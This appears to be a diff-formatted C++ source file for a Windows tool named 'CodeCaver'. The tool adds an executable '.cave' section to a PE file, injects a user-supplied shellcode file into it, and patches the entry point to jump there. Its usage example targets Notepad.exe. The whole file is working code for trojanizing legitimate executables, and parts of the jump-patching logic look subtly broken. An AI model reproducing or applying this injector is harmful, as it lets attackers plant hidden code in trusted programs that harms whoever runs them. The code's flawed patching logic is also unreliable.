| 1 | + | #define _CRT_SECURE_NO_WARNINGS |
| 2 | + | #include <Windows.h> |
| 3 | + | #include <stdio.h> |
| 4 | + | #include <fstream> |
| 5 | + | #include <vector> |
| 6 | + | #include <iostream> |
| 7 | + | #include <filesystem> |
| 8 | + | |
| 9 | + | DWORD align(DWORD size, DWORD align, DWORD addr) { |
| 10 | + | if (!(size % align)) |
| 11 | + | return addr + size; |
| 12 | + | return addr + (size / align + 1) * align; |
| 13 | + | } |
| 14 | + | |
| 15 | + | BOOL InsertSection(const char* path, std::vector<unsigned char> buffer, UINT32 shellSize) |
| 16 | + | { |
| 17 | + | HANDLE file = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); |
| 18 | + | if (file == INVALID_HANDLE_VALUE) |
| 19 | + | { |
| 20 | + | printf("[-] Failed to open file\n"); |
| 21 | + | return FALSE; |
| 22 | + | } |
| 23 | + | |
| 24 | + | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)buffer.data(); |
| 25 | + | if (dos->e_magic != IMAGE_DOS_SIGNATURE) |
| 26 | + | { |
| 27 | + | printf("[-] Invalid PE\n"); |
| 28 | + | return FALSE; |
| 29 | + | } |
| 30 | + | |
| 31 | + | PIMAGE_FILE_HEADER fileHeader = (PIMAGE_FILE_HEADER)(buffer.data() + dos->e_lfanew + sizeof(ULONG)); |
| 32 | + | PIMAGE_OPTIONAL_HEADER64 optionalHeader = (PIMAGE_OPTIONAL_HEADER64)(buffer.data() + dos->e_lfanew + sizeof(ULONG) + sizeof(IMAGE_FILE_HEADER)); |
| 33 | + | PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)(buffer.data() + dos->e_lfanew + sizeof(IMAGE_NT_HEADERS64)); |
| 34 | + | printf("%x\n", sectionHeader->Characteristics); |
| 35 | + | |
| 36 | + | ZeroMemory(§ionHeader[fileHeader->NumberOfSections], sizeof(IMAGE_SECTION_HEADER)); |
| 37 | + | CopyMemory(§ionHeader[fileHeader->NumberOfSections].Name, ".cave", 8); |
| 38 | + | //We use 8 bytes for section name,cause it is the maximum allowed section name size |
| 39 | + | |
| 40 | + | //lets insert all the required information about our new PE section |
| 41 | + | sectionHeader[fileHeader->NumberOfSections].Misc.VirtualSize = align(shellSize, optionalHeader->SectionAlignment, 0); |
| 42 | + | sectionHeader[fileHeader->NumberOfSections].VirtualAddress = align(sectionHeader[fileHeader->NumberOfSections - 1].Misc.VirtualSize, optionalHeader->SectionAlignment, sectionHeader[fileHeader->NumberOfSections - 1].VirtualAddress); |
| 43 | + | sectionHeader[fileHeader->NumberOfSections].SizeOfRawData = align(shellSize, optionalHeader->FileAlignment, 0); |
| 44 | + | sectionHeader[fileHeader->NumberOfSections].PointerToRawData = align(sectionHeader[fileHeader->NumberOfSections - 1].SizeOfRawData, optionalHeader->FileAlignment, sectionHeader[fileHeader->NumberOfSections - 1].PointerToRawData); |
| 45 | + | sectionHeader[fileHeader->NumberOfSections].Characteristics = 0xE00000E0; |
| 46 | + | |
| 47 | + | /* |
| 48 | + | 0xE00000E0 = IMAGE_SCN_MEM_WRITE | |
| 49 | + | IMAGE_SCN_CNT_CODE | |
| 50 | + | IMAGE_SCN_CNT_UNINITIALIZED_DATA | |
| 51 | + | IMAGE_SCN_MEM_EXECUTE | |
| 52 | + | IMAGE_SCN_CNT_INITIALIZED_DATA | |
| 53 | + | IMAGE_SCN_MEM_READ |
| 54 | + | */ |
| 55 | + | SetFilePointer(file, sectionHeader[fileHeader->NumberOfSections].PointerToRawData + sectionHeader[fileHeader->NumberOfSections].SizeOfRawData, NULL, FILE_BEGIN); |
| 56 | + | //end the file right here,on the last section + it's own size |
| 57 | + | SetEndOfFile(file); |
| 58 | + | //now lets change the size of the image,to correspond to our modifications |
| 59 | + | //by adding a new section,the image size is bigger now |
| 60 | + | optionalHeader->SizeOfImage = sectionHeader[fileHeader->NumberOfSections].VirtualAddress + sectionHeader[fileHeader->NumberOfSections].Misc.VirtualSize; |
| 61 | + | //and we added a new section,so we change the NOS too |
| 62 | + | fileHeader->NumberOfSections += 1; |
| 63 | + | SetFilePointer(file, 0, NULL, FILE_BEGIN); |
| 64 | + | //and finaly,we add all the modifications to the file |
| 65 | + | DWORD dw; |
| 66 | + | WriteFile(file, buffer.data(), buffer.size(), &dw, NULL); |
| 67 | + | CloseHandle(file); |
| 68 | + | |
| 69 | + | return TRUE; |
| 70 | + | } |
| 71 | + | |
| 72 | + | BOOL InjectShellcode(const char* path, std::vector<unsigned char> buffer) |
| 73 | + | { |
| 74 | + | HANDLE file = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); |
| 75 | + | if (file == INVALID_HANDLE_VALUE) |
| 76 | + | return false; |
| 77 | + | DWORD filesize = GetFileSize(file, NULL); |
| 78 | + | BYTE* pByte = new BYTE[filesize]; |
| 79 | + | DWORD dw; |
| 80 | + | ReadFile(file, pByte, filesize, &dw, NULL); |
| 81 | + | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)pByte; |
| 82 | + | PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(pByte + dos->e_lfanew); |
| 83 | + | |
| 84 | + | //since we added a new section,it must be the last section added,cause of the code inside |
| 85 | + | //AddSection function,thus we must get to the last section to insert our secret data :) |
| 86 | + | PIMAGE_SECTION_HEADER first = IMAGE_FIRST_SECTION(nt); |
| 87 | + | PIMAGE_SECTION_HEADER last = first + (nt->FileHeader.NumberOfSections - 1); |
| 88 | + | |
| 89 | + | SetFilePointer(file, last->PointerToRawData, NULL, FILE_BEGIN); |
| 90 | + | |
| 91 | + | WriteFile(file, buffer.data(), buffer.size(), &dw, 0); |
| 92 | + | CloseHandle(file); |
| 93 | + | return TRUE; |
| 94 | + | } |
| 95 | + | |
| 96 | + | BOOL PatchInstruction(const char* path) |
| 97 | + | { |
| 98 | + | // Open the file |
| 99 | + | std::ifstream file(path, std::ios::binary); |
| 100 | + | if (!file.is_open()) { |
| 101 | + | std::cerr << "Could not open file: " << path << std::endl; |
| 102 | + | return FALSE; |
| 103 | + | } |
| 104 | + | |
| 105 | + | // Get the file size |
| 106 | + | file.seekg(0, std::ios::end); |
| 107 | + | size_t fileSize = file.tellg(); |
| 108 | + | file.seekg(0, std::ios::beg); |
| 109 | + | |
| 110 | + | // Read the file into a buffer |
| 111 | + | char* buffer = new char[fileSize]; |
| 112 | + | file.read(buffer, fileSize); |
| 113 | + | |
| 114 | + | // Get the DOS header |
| 115 | + | IMAGE_DOS_HEADER* dosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(buffer); |
| 116 | + | if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { |
| 117 | + | std::cerr << "Invalid DOS signature." << std::endl; |
| 118 | + | return FALSE; |
| 119 | + | } |
| 120 | + | |
| 121 | + | // Get the NT headers |
| 122 | + | IMAGE_NT_HEADERS64* ntHeader = reinterpret_cast<IMAGE_NT_HEADERS64*>(buffer + dosHeader->e_lfanew); |
| 123 | + | if (ntHeader->Signature != IMAGE_NT_SIGNATURE) { |
| 124 | + | std::cerr << "Invalid NT signature." << std::endl; |
| 125 | + | return FALSE; |
| 126 | + | } |
| 127 | + | |
| 128 | + | // Get the section headers |
| 129 | + | IMAGE_SECTION_HEADER* sectionHeader = IMAGE_FIRST_SECTION(ntHeader); |
| 130 | + | |
| 131 | + | // Find the .cave section |
| 132 | + | IMAGE_SECTION_HEADER* caveSectionHeader = nullptr; |
| 133 | + | for (int i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { |
| 134 | + | if (strncmp(reinterpret_cast<char*>(sectionHeader[i].Name), ".cave", IMAGE_SIZEOF_SHORT_NAME) == 0) { |
| 135 | + | caveSectionHeader = §ionHeader[i]; |
| 136 | + | break; |
| 137 | + | } |
| 138 | + | } |
| 139 | + | |
| 140 | + | if (caveSectionHeader == nullptr) { |
| 141 | + | std::cerr << "Could not find .cave section." << std::endl; |
| 142 | + | return FALSE; |
| 143 | + | } |
| 144 | + | |
| 145 | + | // Get the RVA of the entry point |
| 146 | + | DWORD entryPointRva = ntHeader->OptionalHeader.AddressOfEntryPoint; |
| 147 | + | printf("[+] Entry point: 0x%x\n", entryPointRva); |
| 148 | + | |
| 149 | + | // Calculate the file offset of the entry point |
| 150 | + | DWORD entryPointOffset = 0; |
| 151 | + | for (int i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { |
| 152 | + | if (entryPointRva >= sectionHeader[i].VirtualAddress && |
| 153 | + | entryPointRva < sectionHeader[i].VirtualAddress + sectionHeader[i].Misc.VirtualSize) { |
| 154 | + | entryPointOffset = sectionHeader[i].PointerToRawData + (entryPointRva - sectionHeader[i].VirtualAddress); |
| 155 | + | break; |
| 156 | + | } |
| 157 | + | } |
| 158 | + | |
| 159 | + | if (entryPointOffset == 0) { |
| 160 | + | std::cerr << "Could not find file offset of entry point." << std::endl; |
| 161 | + | return 1; |
| 162 | + | } |
| 163 | + | |
| 164 | + | // Calculate the address of the jump target |
| 165 | + | DWORD jumpTargetAddress = ntHeader->OptionalHeader.ImageBase + caveSectionHeader->VirtualAddress; |
| 166 | + | DWORD jumpOffset = jumpTargetAddress - (ntHeader->OptionalHeader.ImageBase + entryPointRva + sizeof(5)); |
| 167 | + | |
| 168 | + | // Patch the entry point with a jump instruction to the .cave section |
| 169 | + | unsigned char bytes[5]; |
| 170 | + | bytes[0] = (jumpOffset & 0xFF000000) >> 24; |
| 171 | + | bytes[1] = (jumpOffset & 0x00FF0000) >> 16; |
| 172 | + | bytes[2] = (jumpOffset & 0x0000FF00) >> 8; |
| 173 | + | bytes[3] = jumpOffset & 0x000000FF; |
| 174 | + | bytes[4] = 0xE9; |
| 175 | + | |
| 176 | + | std::reverse(bytes, bytes + sizeof(bytes)); |
| 177 | + | |
| 178 | + | printf("[+] Patch shellcode: "); |
| 179 | + | for (int i = 0; i < sizeof(bytes); i++) |
| 180 | + | printf("0x%x ", bytes[i]); |
| 181 | + | printf("\n"); |
| 182 | + | |
| 183 | + | memcpy(buffer + entryPointOffset, bytes, sizeof(bytes)); |
| 184 | + | memcpy(buffer + entryPointOffset + sizeof(bytes), &jumpOffset, sizeof(jumpOffset)); |
| 185 | + | |
| 186 | + | std::cout << "[+] Patched entrypoint" << std::endl; |
| 187 | + | |
| 188 | + | // Save the patched file to disk |
| 189 | + | std::ofstream outputFile("patched.exe", std::ios::binary); |
| 190 | + | if (!outputFile.is_open()) { |
| 191 | + | std::cerr << "Could not create output file." << std::endl; |
| 192 | + | return 1; |
| 193 | + | } |
| 194 | + | outputFile.write(buffer, fileSize); |
| 195 | + | |
| 196 | + | // Cleanup |
| 197 | + | delete[] buffer; |
| 198 | + | |
| 199 | + | std::cout << "[+] Patched file saved to 'patched.exe'" << std::endl; |
| 200 | + | |
| 201 | + | return TRUE; |
| 202 | + | } |
| 203 | + | |
| 204 | + | VOID Helper() |
| 205 | + | { |
| 206 | + | printf("\n"); |
| 207 | + | printf("Usage:\n"); |
| 208 | + | printf("CodeCaver.exe executable shellcode\n\n"); |
| 209 | + | printf("Example:\n"); |
| 210 | + | printf("CodeCaver.exe C:\\Notepad.exe C:\\Users\\user\\shellcode.bin\n\n"); |
| 211 | + | } |
| 212 | + | |
| 213 | + | int main(int argc, char* argv[]) |
| 214 | + | { |
| 215 | + | if (argc < 3) |
| 216 | + | { |
| 217 | + | printf("[-] Invalid paramters\n"); |
| 218 | + | Helper(); |
| 219 | + | return -1; |
| 220 | + | } |
| 221 | + | |
| 222 | + | const char* exePath = argv[1]; |
| 223 | + | const char* shellPath = argv[2]; |
| 224 | + | |
| 225 | + | std::ifstream exe(exePath, std::ios::binary); |
| 226 | + | std::vector<unsigned char> exeBuffer(std::istreambuf_iterator<char>(exe), {}); |
| 227 | + | exe.close(); |
| 228 | + | |
| 229 | + | std::ifstream shell(shellPath, std::ios::binary); |
| 230 | + | std::vector<unsigned char> shellBuffer(std::istreambuf_iterator<char>(shell), {}); |
| 231 | + | shell.close(); |
| 232 | + | |
| 233 | + | printf("[+] Exe size: %d\n", exeBuffer.size()); |
| 234 | + | printf("[+] Shellcode size: %d\n", shellBuffer.size()); |
| 235 | + | |
| 236 | + | if (!InsertSection(exePath, exeBuffer, shellBuffer.size())) |
| 237 | + | return -1; |
| 238 | + | |
| 239 | + | if (!InjectShellcode(exePath, shellBuffer)) |
| 240 | + | return -1; |
| 241 | + | |
| 242 | + | if (!PatchInstruction(exePath)) |
| 243 | + | return -1; |
| 244 | + | |
| 245 | + | printf("[+] Success!\n"); |
| 246 | + | } |